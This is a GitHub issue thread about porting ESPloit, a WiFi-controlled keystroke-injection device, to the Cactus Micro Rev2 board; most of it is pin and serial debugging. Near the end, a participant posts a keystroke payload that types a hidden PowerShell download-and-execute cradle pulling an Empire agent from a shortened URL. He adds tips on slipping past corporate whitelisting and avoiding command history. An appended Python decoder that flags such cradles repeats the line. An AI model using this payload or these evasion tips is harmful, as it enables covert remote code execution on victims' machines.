exploitagency / github-ESPloit

!!! Deprecated See ESPloitV2 !!! Original PoC(Released: Sep 11, 2016) - WiFi controlled keystroke injection Using ESP8266 and 32u4 based Arduino HID Keyboard Emulator

[Enhancement] Porting to Cactus Micro Rev2 #1

Closed minkione closed 7 years ago

minkione commented 7 years ago

I am looking to port it on a Cactus Micro Rev2 since it uses both ESP8266 and ATmega32u4 Chip. Maybe you already thought about it. :)

exploitagency commented 7 years ago

That's a great idea, I've never used one of these. Without doing any research, do you upload one program to the ESP and another to the 32u4? If so it would be as easy as changing the pin settings for rx/tx I imagine... Will look into it when I get some free time. Thanks for the suggestion. Let me know if you make any progress.

EDIT: So after doing about 30 seconds of research it looks like you upload the esp8266 programmer sketch to the arduino then flash the esp8266, then upload your arduino sketch. This should be an incredibly easy port if it is as simple as that. Literally changing RX/TX in BOTH the ESP and ARDUINO sketch should be enough if I recall my code correctly, I haven't been deep in the code of this project in a while.

So give it a shot, let me know how it goes. I'm going to order a couple right now.

minkione commented 7 years ago

The flow should be:

I tried with your sketches for both the 32u4 and ESP8266... but they are failing... I guess I will need further investigation (since I am kinda new to ESP chipsets). But looks promising! :) 👍

[0] https://github.com/AprilBrother/cactus-micro-r2/blob/master/libraries/CactusMicro/examples/esp8266Programmer/esp8266Programmer.ino [1] https://github.com/nodemcu/nodemcu-flasher/blob/master/Win64/Release/ESP8266Flasher.exe

exploitagency commented 7 years ago

How are you failing? Need more info. You need to change the rx/tx in both sketches. Then you need to change the WiFi info in the ESP8266 sketch; by default it is a hidden SSID of Exploit with a password of DotAgency, IIRC. Readme should clarify. PS What is the cheapest source for one of these dev boards? Only place I found it in stock was ebay for a little under $20, that's fairly pricey for what it is. I'll order just one if that's the case.

minkione commented 7 years ago

I successfully compiled your ESP firmware into a .bin file and it successfully got uploaded into the cactus micro... Afterwards I successfully uploaded your 32u4 sketch... and so far so good. Then I wait (u know the usual 90+ secs for first bootup)... but nothing happens (no SSID). Of course I did change your hidden SSID settings ;]

As I said I need to read your code carefully and see where it fails :) Troubleshooting or debugging suggestions are welcome though :)

exploitagency commented 7 years ago

Hold on...

Paste how you have these settings


```cpp
// ***Begin WiFi Configuration***
const int accesspointmode = 1; // set to 0 to connect to an existing network or leave it set to 1 to use the esp8266 as an access point

// SSID and PASSWORD of network go below
const char ssid[] = "Exploit";
const char password[] = "DotAgency";
// channel and hidden are for when using the esp8266 as an access point
const int channel = 6;
const int hidden = 1; // set int hidden to 0 to broadcast SSID of access point or leave as 1 to hide SSID

// Configure Networking
IPAddress local_IP(192,168,1,1); //IP of the esp8266 server
IPAddress gateway(192,168,1,1);
IPAddress subnet(255,255,255,0);

// Port for web server
ESP8266WebServer server(80);
```

The only change you need to make for testing is `const int hidden = 1; // s` to `const int hidden = 0; // s`

You may need to manually format the SPIFFS file system... It should automatically do it though

The 90+ seconds is the spiffs being formatted, this is a one time deal, afterwards boot is MUCH faster

PS: Do you have a source for these boards cheap?

EDIT: The anticipation is killing me... this is such a cool little board, I can't believed I released this project without noticing this board... haha.

Perhaps you need to set the size of the spiffs in your programmer

| Board | Flash | SPIFFS sizes |
|---|---|---|
| Generic module | 512k | 64k, 128k |
| Generic module | 1M | 64k, 128k, 256k, 512k |
| Generic module | 2M | 1M |
| Generic module | 4M | 3M |
| Adafruit HUZZAH | 4M | 1M, 3M |

I think the cactus uses Esp03 at 512k meaning use a 64k spiffs, don't quote me on that, there's so many different versions being referred to as Rev2 it's hard for me to tell. Clones!!!

Read serial from the ESP8266 itself and it will output debug messages to an extent like boot, started wifi, web server, etc

exploitagency commented 7 years ago

Aha! I remember a problem I had. I couldn't always see the network when using my USB cable to power the device, these ESP dev boards are power hungry, try using external batteries to power it and see if it boots up right. EDIT: I think it was just the FTDI didn't have the current to boot the ESP but once I wired it to the 32u4 and ran it off usb it was fine.

See what VIN specs are, if it can handle 6V then do 4 AA's or AAA's in series.(Pos wired to Neg, etc.)

From ebay ad it says

Input voltage 5v usb 4.3-12v raw

It says not to use usb and vin together... in ebay ad. I'm not sure about this... I feel like maybe it was the initial boot formatting spiffs etc that my usb didn't provide enough current for, or maybe my usb hub had external power that I hid it inside of and I always needed external power. It's been a while since I've visited this project, sorry the minute details have been lost. EDIT: I think it was just the FTDI didn't have the current to boot the ESP but once I wired it to the 32u4 and ran it off usb it was fine.

Hope I gave enough tips for you to have success. Please do post when you figure out anything! Aside from the tiny file system of an esp03 vs plentiful large file system of the eps12 i used i think the cactus is a good choice for smaller payloads. That is if it proves functional at all.

One more thing I noticed based on what you're saying. To paraphrase and not be very accurate at all: Get the Arduino in ESP8266 programmer mode. Open up Arduino IDE: Arduino IDE 1.6.11 or thereabouts. Make sure this is installed: Board Manager/Libraries: esp8266 by ESP8266 Community version 2.3.0. Then open the esp sketch, choose arduino as programmer or whatever, and flash...

I made the esp8266 code with this library which you will need: esp8266 by ESP8266 Community version 2.3.0 and I made it as an arduino "sketch", this may also be a snag you're having....

I'm feeling like this might be an issue: Use ESP8266Flasher.exe to flash the ESP firmware [1] I would instead have arduino ide set up with appropriate library and choose the proper programmer from list(arduino as programmer or whatever).

If I buy a cactusMicro rev2 I'll get this working on Linux first then setup a Windows VM and do some testing.

exploitagency commented 7 years ago

In case you're just reading emails please come back and check the actual issue page and look at my edits. I think you'll have enough info now to have success. Please keep me updated!

minkione commented 7 years ago

Sorry mate! I was away from my laptop! ✌️

1) I have tried with the HUB USB (externally powered), no luck. I guess it is definitely something deeper in the differences between your 32u4-based board and mine (a.k.a. cactus micro rev2). About it, I can confirm that the cactus does work with another similar project [1] (p.s. I like basic4's idea of using the serial communication as TX/RX channel to get a shell back..., but the usage of external controllers, rather than your Web-based solution... is a horrible option IMO. Much better your web-UI).

2) good point about flashing + arduino + ESP firmware! I need to look at it and try the 1.6.11. Right now I am using the 1.8.x + ESP8266 2.3.0.

3) I need to look at the [1] codebase and see how it differs from your ESP sketch. So far I see that the syntax is slightly different, but didn't dig deeper. (Time is always a problem 🤕 )

[1] https://github.com/basic4/WiDucky

P.S. About the version I have, it is the original one http://wiki.aprbrother.com/wiki/Cactus_Micro_Rev2 P.P.S. Overall, I am quite good with OpenWRT and Linux in general... but Arduino and ESP are not my daily hobbies... so I deeply suck and am horribly slow 😛

exploitagency commented 7 years ago

Yeah flash the esp with the arduino ide, and choose esp03 settings for spiffs file system should be 64k with your model i think. I used an esp12

I don't use windows except in vms but will eventually make a vm and try to make it work with cactus if I order one.

You're compiling the code for esp in arduino ide right? Try using Arduino IDE to flash the esp as well.

exploitagency commented 7 years ago

Does your esp flasher ask you to specify memory offsets?

minkione commented 7 years ago

Forgot to post you the shop where I bought it: https://www.aliexpress.com/item/Cactus-Micro-Rev2-Esp8266-ESP-03-for-Arduino-Compatible-Male-Header-WIFI-chip-esp8266-ESP8266-WIFI/32715064135.html

As you can see I can set in the Flasher the memory size (i.e. 512K for ESP-03). I also tried with Arduino flasher, but no luck. The idea behind esp8266Programmer.ino is to flash the cactus 32u4 to act as pass-through to the serial connection TX/RX of the ESP-03 in order to push from Flasher.exe (through serial) the firmware into the ESP-03. Afterwards, once successfully pushed the ESP firmware, you can reflash the 32u4 with its sketch (in your case a.k.a. arduino-sketch.ino).

exploitagency commented 7 years ago

You compile the code for esp in arduino ide right, don't see how it'd compile otherwise?

Make sure in arduino ide settings are right for spiffs size, though i think it happens during programming setting memory offsets. I think this is the problem and flashing.

What's under the config tab of flasher.exe?

Keep trying different programmers in settings for arduino ide. I feel it will be "arduino as programmer" or maybe an esp03 option.

Or try uploading code that uses spiffs and see if it will work.

Is there anyway you can open a serial emulator and watch the esp boot? This will tell us a lot. Maybe even leaving the arduino in programmer mode will help if its just serial passthrough.

minkione commented 7 years ago

I need to add that to the list of todo things. Now I am looking at the syntax differences between your sketches and these ones. https://github.com/basic4/WiDucky/tree/master/Cactus

Somehow I have the feeling that, despite the fact both HW have the same Atmel 32u4... the lilypad (a.k.a. cactusmicro) is using a slightly different syntax than your CJMCU-Beetle.

Example.... if u look at the ESP sketch for the WiDucky... https://github.com/basic4/WiDucky/blob/master/Cactus/sketch_wifiduckCactus_ESPModule.ino And compare with yours https://github.com/exploitagency/github-ESPloit/blob/master/code/esp-sketch/esp-sketch.ino you can see immediately the differences.

in your case you use the CJMCU-Beetle to talk with the ESP

```cpp
Serial.print("Starting Access Point ... ");
Serial.println(WiFi.softAP(ssid, password, channel, hidden) ? "Success" : "Failed!");
```

Instead in sketch_wifiduckCactus_ESPModule.ino is straight

```cpp
void setup() {
  //enable the wifi chip
  pinMode(LED_BUILTIN, OUTPUT);
  //external reset mode
  //pinMode(12,INPUT_PULLUP);
  WiFi.mode(WIFI_AP);
  WiFi.softAP("WiDucky", "quackings");
  Serial.begin(19200);
  server.begin();
  ledOn(false);
}
```

Overall, I believe some parts of your code will have to be ported for the cactus. (of course it is just an early assumption, since it is less than 72 hours that I've been using this cactus micro! :)

exploitagency commented 7 years ago

```cpp
Serial.print("Starting Access Point ... ");
Serial.println(WiFi.softAP(ssid, password, channel, hidden) ? "Success" : "Failed!");
```

What this does is start a line Starting Access Point....

Then it starts the access point and based on output it ends the line with Success or Failed and line breaks.

Starting Access Point....[access point starts] Success

Like that...

It's the same thing.

Theirs is `WiFi.softAP("WiDucky", "quackings");` Access point WiDucky, pass quackings

Mine `WiFi.softAP(ssid, password, channel, hidden)` uses variables too, ssid=? password=? channel=? hidden=? etc...

I feel like its an issue with spiffs

please try a serial emulator and see what it is saying

exploitagency commented 7 years ago

Maybe try adding a new line containing SPIFFS.format() above line 86 SPIFFS.begin(); in esp-sketch.ino.

Perhaps it isn't able to start spiffs and stops before it reaches any configuration.

In my testing it seemed the boards automatically formatted the file system if it didn't exist, but I only tested what I believed to be a few virgin boards.

Another possibility is that the pins set in the sketch are interfering with something. I'll have to look at some pin outs.

Try this:

| ESP8266 | Cactus |
|---|---|
| GPIO13 | 2 (For I2C etc) |
| GPIO12 | 3 (For I2C etc) |

`esp-sketch.ino` change: `const int RXpin=12; const int TXpin=13;`

`arduino-sketch.ino` change: `const int RXpin=3; const int TXpin=2;`

Start with unmodified virgin ino files exactly as downloaded, only change the above and hidden to 0 in `esp-sketch.ino`: `const int hidden = 0;`

PS: I think you can use the ESP GPIO numbers, but you may need to change those to actual pin #'s, I don't recall, this is just off the top of my head from looking up the cactus micro wiki. http://wiki.aprbrother.com/wiki/Cactus_Micro_Rev2_Hookup_Guide#ESP8266_Pins

exploitagency commented 7 years ago

Thanks for sending links to working Cactus Micro Rev2 examples, I was just able to investigate it and review the code. It looks like you'll need to enable ch_pd manually through the arduino's code.

So ignoring the other replies and following this single post with changes to enable esp and changes to rx and tx pins and hidden ssid and if it works I already added comments in the code but havent posted it live yet just let me know if it works and I will post the commit and give you some credit for getting things tested.

I'm pretty confident I found the culprit... and you were right about needing to add additional code, two lines for enable ch_pd plus changing the configuration of rx,tx variables should do it.

Start with unmodified ino files exactly as downloaded from repo, only change the below for testing purposes

Open arduino-sketch.ino

Change starting at line 51:

```cpp
void setup() {
  SOFTserial.begin(4800);
```

To:

```cpp
void setup() {
  pinMode(13, OUTPUT);
  digitalWrite(13,HIGH);
  SOFTserial.begin(4800);
```

and in `arduino-sketch.ino` change: `const int hidden = 0;`

I can't believe I didn't think of this earlier, on the cactus micro rev2 I just assumed the esp03 was on when the arduino was on but we have to manually turn on the ESP8266 first apparently from the Arduino, which is actually a smart thing to do saving battery power and what not. ::face-palm::

ENABLE (CH_PD) 13 http://wiki.aprbrother.com/wiki/Cactus_Micro_Rev2_Hookup_Guide#ESP8266_Pins

also do:

`esp-sketch.ino` change: `const int RXpin=12; const int TXpin=13;`

`arduino-sketch.ino` change: `const int RXpin=3; const int TXpin=2;`

Good luck, let me know how it goes, I can always send modified ino files if I am confusing you or not being clear enough because thus far I've thought of everything but the right answer, but now I believe I've got it. I'll be ordering a board or three tonight, thanks for turning me onto this one. If only it was an Esp12 though... someone needs to make that.

minkione commented 7 years ago

Ok, little update! The firmware update worked like a charm with the following settings.

I of course applied the mods you suggested on a fresh repo and now I am able to:

Sadly it doesn't execute the HID emulation part (i.e. nothing is typed on the keyboard. FYI I use by default the US one).

I feel we are very close to the solution of the riddle! 👍 🤞

minkione commented 7 years ago

What if instead of `Keyboard.print(keycode);` we use `Keyboard.write(keycode);` ?

minkione commented 7 years ago

That's funny... I replaced all `Keyboard.print(keycode)` with `Keyboard.write(keycode)` and I got...

```
C:\Program Files (x86)\Arduino\libraries\Keyboard\src/Keyboard.h:91:10: note:   no known conversion for argument 1 from 'String' to 'uint8_t {aka unsigned char}'

exit status 1
no matching function for call to 'Keyboard_::write(String&)'
```

But if I look at the specs... https://www.arduino.cc/en/Reference/KeyboardWrite should work...

Another funny fact... is that in https://github.com/basic4/WiDucky/blob/master/Cactus/sketch_wifiduck_Cactus4.ino.ino The Keyboard.write() works!

```cpp
default:
    if(multi == 0)
    {
       //Normal Single character code
       Keyboard.write(inpx);
       delay(20);
    }
    else
    {
       //Part of a multi-key command
       Keyboard.press(inpx);
       delay(30);
    }
    break;
```

exploitagency commented 7 years ago

Nah leave the source the same. The problem must be the rx and tx pins. Maybe I made a mistake, swap the rx and tx values with each other that I gave you, but only in one sketch, not in both. I think that'll do it

exploitagency commented 7 years ago

`esp-sketch.ino` change: `const int RXpin=12; const int TXpin=13;`

Like below `arduino-sketch.ino` change: `const int RXpin=2; const int TXpin=3;`

minkione commented 7 years ago

No luck. Will gonna try: `esp-sketch.ino` change: `const int RXpin=12; const int TXpin=13;`

`arduino-sketch.ino` change: `const int RXpin=3; const int TXpin=2;`

minkione commented 7 years ago

No luck as well. At this point only this option is left... `esp-sketch.ino` change: `const int RXpin=12; const int TXpin=13;`

`arduino-sketch.ino` change: `const int RXpin=2; const int TXpin=3;`

exploitagency commented 7 years ago

Problem is which pins are set up to rx and tx with each other, I'm pretty sure. I will inspect it after work. Keep playing with those pins and look at the pinout in the linked wiki

minkione commented 7 years ago

And.... doesn't work as well. I will read carefully cactus micro wiki and schematics. I am missing something obvious. ;]

exploitagency commented 7 years ago

Rx goes to tx and tx goes to rx. Look at the two pins connected with each other on esp and arduino in cactus

minkione commented 7 years ago

I believe I got the point. Check the wiki http://wiki.aprbrother.com/wiki/Cactus_Micro_Rev2_Hookup_Guide

ESP8266 Pins

The Cactus Micro Rev2 has connected to esp8266 with these pins.

| ESP8266 | Cactus Micro Rev2 |
|---|---|
| GPIO0 | 12 |
| ENABLE (CH_PD) | 13 |
| RX | TXO (Serial1) |
| TX | RXI (Serial1) |
| GND | GND |
| GPIO13 | 2 (For I2C etc) |
| GPIO12 | 3 (For I2C etc) |
| GPIO14 | A4 |

We need to use Serial1 and not `SoftwareSerial SOFTserial(RXpin,TXpin);` ! 😄 Ok, I am up too late and need to wake up in a few hours. Tomorrow I'll continue! ;]

exploitagency commented 7 years ago

You have to go to view payloads and run the payload once you upload it. And you're uploading a payload from the examples for testing? Be sure to note the format for scripting one too. Just making sure... need to eliminate the obvious before digging too deep. Could it be a locale issue with you using a different language keyboard?

For clarification I used serial for debugging over serial and SOFTserial to communicate between ESP and 32u4. But feel free to make any mods hope you get it working.

I won't be home at any reasonable hour maybe tomorrow I will look into it more. But definitely trying to buy my own boards tonight when I get home so if all else fails a month or two from now when they arrive I will get it working. Keep me updated thanks.

I think you're right btw in that serial1 could work but I also think software serial is still possible to use somehow. Sorry if anything offends you, I always have to ask simple questions. I just try to keep a codebase fairly universal with minimal changes. Let me know how it goes, thanks for having so much interest in the project and dealing with all these hurdles.

Something that keeps screwing me up is stuff like this http://www.globalsources.com/si/AS/Beijing-April/6008848879733/pdtl/Beacon-modules/1129250477.htm This is a rev1 being advertised as a rev2 right?

It says

How it works: The ESP8266 chip communicates with Atmega32U4 through the SoftwareSerial or Serial (hardware serial port) It can be switched by a jumper The default port for communication is SoftwareSerial port (RX: 11, TX: 12) The pin 13 is connected to pin CH_PD of ESP8266 Put the pin 13 high to enable ESP8266 chip

You don't have a jumper right?

If you do that's the trick, but the more I look at it I think you're dead on the money and we will have to change to using Serial1, as much as I hate to switch things up; after all it is somewhat of a PORTING of code to a different dev board, as similar as they may be it is still different. Looks like you need to run serial1 on arduino and serial or softserial on the esp, it may mess some things up with the serial debugger messages being output from the esp causing the arduino to type something, you may need to comment those out in the esp sketch. One reason I used softserial...

minkione commented 7 years ago

My HW is a REV2. https://www.aliexpress.com/item/Cactus-Micro-Rev2-Esp8266-ESP-03-for-Arduino-Compatible-Male-Header-WIFI-chip-esp8266-ESP8266-WIFI/32715064135.html

So I was playing a bit in the lunch and here the progress... (still WIP) http://pastebin.com/Dc8X2uLS http://pastebin.com/xX3YrBsP

The idea is that instead of using `//SOFTserial.....` I use `Serial1.xxxxxx`

At the end we just need Serial1 to communicate between ESP and 32u4. (In your case, you were using SOFTserial and serial. The latter as debug interface (if enabled).

Overall I still need to read with calm. So far with the sketches I provided you I can see the SSID and get connect/upload stuff. The only part missing is the keystrokes injected... which at this point should be related with the serial communication between ESP and 32u4.

Stay tuned... if I'll have time after work. 👍

exploitagency commented 7 years ago

I think you'll need to run serial1 on the Arduino and just plain serial on the ESP for the way you are wanting to do the two way communication from ESP-Arduino, at least thats how I interpret the wiki.

The original serial in my project is debugging text for serial emulator to read. If this is the case you'll need to likely comment out some debugger text in the esp sketch if it gets typed up by the Arduino. I'm not sure if any of it interferes and in what scenarios. It will be great to add the cactus micro rev2 to the project though. I've just ordered one.

It's cool having both on one dev board but in the same sense you're stuck with the connections they chose unless modifying the board.

exploitagency commented 7 years ago

It appears perhaps GPIO0 and 12 and GPIO14 and A4 are actually physically connected and the pins I originally suggested (GPIO12 and GPIO13) are not actually physically connected (despite the misleading chart in wiki) and require J1 and J2 to be soldered.

So lets try these changes to a fresh downloaded copy of the code. It might not work because I think the RX pin on the Arduino needs to be an Interrupt with softwareserial.

| ESP8266 | Cactus Micro Rev2 |
|---|---|
| GPIO0 | 12 |
| GPIO14 | A4 |

`esp-sketch.ino` change:

```cpp
const int RXpin=0;
const int TXpin=14;
```

`arduino-sketch.ino` change:

```cpp
const int RXpin=12;
const int TXpin=A4;
```

and in `arduino-sketch.ino` change: `const int hidden = 0;`

Open arduino-sketch.ino

Change starting at line 51:

```cpp
void setup() {
  SOFTserial.begin(4800);
```

To:

```cpp
void setup() {
  pinMode(13, OUTPUT);
  digitalWrite(13,HIGH);
  SOFTserial.begin(4800);
```

IF THAT DOESN'T WORK!:

I may have solved the issue... Use the SOFTserial like I mentioned before and make the changes below:

Of course start with a fresh unmodified copy of repo.

`esp-sketch.ino` change:

```cpp
const int RXpin=13;
const int TXpin=12;
```

`arduino-sketch.ino` change:

```cpp
const int RXpin=3;
const int TXpin=2;
```

and in `arduino-sketch.ino` change: `const int hidden = 0;`

Open arduino-sketch.ino

Change starting at line 51:

```cpp
void setup() {
  SOFTserial.begin(4800);
```

To:

```cpp
void setup() {
  pinMode(13, OUTPUT);
  digitalWrite(13,HIGH);
  SOFTserial.begin(4800);
```

NOW! Here is the part that I believe solves it...


Put a solder bridge between the two pins on J1 and then a separate solder bridge between the pins on J2. Obviously do not solder J1 to J2, instead just connecting the two pads at each jump point.

Apparently the GPIO of the ESP03 is actually NOT connected to the 32u4 and is why my solution didn't work previously. This retains all functionality without introducing any bugs involved with the way the ESP is going to throw garbage to the serial port during boot etc...

If you use Serial on ESP and Serial1 on 32u4 the current code may cause garbage to be spit out or introduce bugs when the ESP does its garbage data output and boot messages.

I am certainly excited to receive my cactus micro rev2 board and this is the path I plan on taking before I even flash it. I know some people don't like soldering but this is an easy one right here... if you can't see picture good the points are on the bottom right of the board above pin 16.

NOTE:! Make sure r5 and r6 resistors are missing else clip them off.

Also please forgive me if I am wrong, I've been flipping through the Leonardo 32u4 and the cactus micro pinouts real quick after work. But it seems to me that it would work. So be sure to review my ideas before attempting them.

minkione commented 7 years ago

I went for the refactoring way and worked. I removed the softserial and the debug serial. And just using the Serial1.

arduino-sketch_cactus.txt

esp-sketch-cactus.txt

P.S. I tried both solutions you suggested (with the jumpers bridged of course) and they didn't work. Thus I went for the sw refactoring. 👍

exploitagency commented 7 years ago

Well good job getting it working, I was hoping I could skate by on only requiring a few lines to be changed vs swapping from softserial to serial1.

Upon reviewing the code are you sure you need all these includes?

include

include

include

include

include

include

include

include

I think this will still cover it, I didn't see any changes to that stuff but maybe I missed something.

include

include

include

include

Also I believe this line can be deleted now as we aren't using the debugger thus the output isn't useful.

```cpp
WiFi.localIP();
```

I'll do a little more testing once I get mine and make sure it doesn't do anything crazy upon insert of the device and is still working cross platform, because ESP has some garbled junk go over serial when booting. I think it will be fine though, though there's a lot of possibilities of new problems. So everything seems to work good then now? Also if you come up with any neat payloads I can also include them. Will give you credit as well.

minkione commented 7 years ago

Actually, I added those libraries just in case (I still need to clean up the junk leftover from some tests).

One thing I have noticed, is that if I use `int DelayLength=2000;` everything works fine. But if I try to reduce the delay... example: `int DelayLength=1000;` It doesn't work properly.

Did you face the same issues while testing your code? That's the reason you put 2000ms then?

P.S. About payloads... the usual one I use is:

```
Delay
Delay
Delay
Press:131+114
PrintLine:powershell -W Hidden -nop -noni -c "IEX (New-Object Net.Webclient).downloadstring('https://goo.gl/XXXXX')"
```

Which will execute the Empire Powershell launcher, which usually I host on Gist and then use the google shortener to shorten the URL.

Most corporate environments are whitelisting both gist.github.com and google, so it is easy to deploy an agent in this way. (of course this payload will leave the command `powershell -W Hidden -nop -noni -c "IEX (New-Object Net.Webclient).downloadstring('https://goo.gl/XXXXX')"` in the cmd history. But you just need to execute it in a cmd to avoid it (no history, but takes more time to type).

```
Delay
Delay
Delay
Press:131+114
PrintLine:cmd
PrintLine:powershell -W Hidden -nop -noni -c "IEX (New-Object Net.Webclient).downloadstring('https://goo.gl/xxxxx')"
```

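A small decoder for the payload format used in this thread, added here as an example for reviewing a payload before it is loaded (not ESPloit's own code, and not part of the original thread). It assumes the three line forms seen above (`Delay`, `Press:<code>[+<code>]`, `PrintLine:<text>`) and that the numeric codes are Arduino Keyboard library values, so `Press:131+114` reads as LEFT_GUI + 'r'; the sample payload is constructed from the one posted above with the placeholder URL kept.

```python
"""Decode ESPloit-style text payloads into a readable step list."""
# Added example, not ESPloit's own code. Assumed format: one step per line,
# "Delay", "Press:<code>[+<code>...]" or "PrintLine:<text>", with codes taken
# from the Arduino Keyboard library (131 = KEY_LEFT_GUI, 114 = ASCII 'r').
from dataclasses import dataclass, field
from typing import List, Optional

# Arduino Keyboard.h key codes for the non-printable keys
ARDUINO_KEYS = {
    128: "LEFT_CTRL", 129: "LEFT_SHIFT", 130: "LEFT_ALT", 131: "LEFT_GUI",
    132: "RIGHT_CTRL", 133: "RIGHT_SHIFT", 134: "RIGHT_ALT", 135: "RIGHT_GUI",
    176: "RETURN", 177: "ESC", 178: "BACKSPACE", 179: "TAB", 193: "CAPS_LOCK",
    209: "INSERT", 210: "HOME", 211: "PAGE_UP", 212: "DELETE", 213: "END",
    214: "PAGE_DOWN", 215: "RIGHT_ARROW", 216: "LEFT_ARROW",
    217: "DOWN_ARROW", 218: "UP_ARROW",
}
ARDUINO_KEYS.update({194 + i: f"F{i + 1}" for i in range(12)})  # F1..F12

# Substrings a reviewer would want flagged in typed text (constructed list)
CRADLE_MARKERS = ("powershell", "iex", "downloadstring", "-w hidden", "-nop", "-noni")


@dataclass
class Step:
    kind: str            # "delay", "press" or "printline"
    detail: str          # human-readable description of the step
    text: str = ""       # literal text typed (printline only)
    flags: List[str] = field(default_factory=list)  # markers found in text


def key_name(code: int) -> str:
    """Map an Arduino key code to a name; printable ASCII is typed as itself."""
    if code in ARDUINO_KEYS:
        return ARDUINO_KEYS[code]
    if 32 <= code < 127:
        return repr(chr(code))
    return f"<unknown {code}>"


def parse_line(line: str) -> Optional[Step]:
    """Parse one payload line; blank lines are skipped, unknown ones rejected."""
    line = line.rstrip("\r\n")
    if not line.strip():
        return None
    if line == "Delay":
        return Step("delay", "wait DelayLength ms")
    if line.startswith("Press:"):
        codes = [int(c) for c in line[len("Press:"):].split("+") if c]
        return Step("press", "+".join(key_name(c) for c in codes))
    if line.startswith("PrintLine:"):
        text = line[len("PrintLine:"):]
        low = text.lower()
        flags = [m for m in CRADLE_MARKERS if m in low]
        return Step("printline", "type text and press Enter", text, flags)
    raise ValueError(f"unrecognised payload line: {line!r}")


def decode_payload(payload: str) -> List[Step]:
    return [s for s in (parse_line(l) for l in payload.splitlines()) if s]


def summarize(payload: str) -> List[str]:
    """One line per step, with a marker on steps that look like download cradles."""
    out = []
    for i, s in enumerate(decode_payload(payload), 1):
        mark = "  [FLAG: " + ", ".join(s.flags) + "]" if s.flags else ""
        body = f"type {s.text!r} + Enter" if s.kind == "printline" else s.detail
        out.append(f"{i:02d} {s.kind:<9} {body}{mark}")
    return out


# Constructed sample: the Win+R style payload from the thread, placeholder URL kept
SAMPLE_PAYLOAD = """Delay
Delay
Delay
Press:131+114
PrintLine:cmd
PrintLine:powershell -W Hidden -nop -noni -c "IEX (New-Object Net.Webclient).downloadstring('https://goo.gl/XXXXX')"
"""

if __name__ == "__main__":
    for row in summarize(SAMPLE_PAYLOAD):
        print(row)
```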
exploitagency commented 7 years ago

I apologize, but yes... I have lowered the delay about as much as is possible without rewriting the whole project more than likely. You can tweak it for different OS or systems(hardware slower or faster). But this is the fairly universally happy cross platform delay I found. Mac, Linux, Windows... the trio.

Why did you remove this line from arduino-sketch?

```cpp
SOFTserial.println(fullkeys);
```

vs changing it to

```cpp
Serial1.println(fullkeys);
```

exploitagency commented 7 years ago

Ok try this code, I went back through my code adding in the Serial1 and Serial changes as suggested while retaining the old code as comments and kept the line mentioned above for fullkeys and removed more unneeded stuff. Want to make sure we can select to use the max setting for SPIFFS file system since its so much smaller than an ESP12. Though I doubt any of those includes have that great of an impact.

Password is DotAgency

arduino-sketch-cactus.txt esp-sketch-cactus.txt

minkione commented 7 years ago

I removed that `SOFTserial.println(fullkeys);` because we don't need to write back to the ESP. We use the Serial1 just to read from the ESP and then forward it to the HID through Keyboard()

Doesn't sound legit or I missed something?

About your sketches I will have to wait until Monday since I forgot the hw at work :facepalm

exploitagency commented 7 years ago

No problem. I'll have to review code over the weekend and see what it was for... its one of my older projects Thanks for all your hard work. Do you have access to test on Mac Windows and Linux?

minkione commented 7 years ago

Usually corporate targets are windows. But I will create and test some payloads for OSX and Linux as well. As soon as I have them, I'll let ya know ;)

exploitagency commented 7 years ago

Thanks. Looks like that line might have been doing some debugging or testing and can be removed. Idk. Will have to look at it on a real computer with esp code side by side vs on my phone. But I'd wager it's a leftover bit that wouldn't hurt to be removed from the original source as well.

EDIT: I can pretty well confirm it should work without that line, I must have been debugging things using the ESP's serial output connected to a serial console while writing the code and forgot to remove that line before publishing the code and actually adding the debug to the arduino's serial output... I was just doing a diff earlier when I noticed you removed that line. Looks like we might be good to go then. Let me know if you find a better value for delay too!

Will publish changes once you can confirm it's all good to go. Hope my Cactus Micro gets here soon... I trust your testing though and if there's any problems I can work on them once my board gets here. I can also make a separate folder in payloads titled as your username and a little text file with credit and add some of your payloads if you want. Just be sure to arrange them in separate folders by OS if you would, that'll make it easy for people. Thanks again!

exploitagency commented 7 years ago

esp-sketch-cactus.txt arduino-sketch-cactus.txt

minkione commented 7 years ago

Just tried your sketches and of course work. ;]

exploitagency commented 7 years ago

I added the port to the repo! (might be a good idea to test the commit though) I'll close this issue since the port is done but you can still respond to it with payloads or open a new issue. Thanks again for all your help, it was a great suggestion and I am glad it worked out, you were right on the money. Thanks for all the hard work.

Note: I reverted hidden back to 1 to coincide with readme. Also I don't remember why I chose 4800 for the serial speed, perhaps increasing the baud rate will help us be able to lower the delay slightly.

minkione commented 7 years ago

I am planning to create a payload for OSX as well. As soon as I will have time and access to the macbook. ;]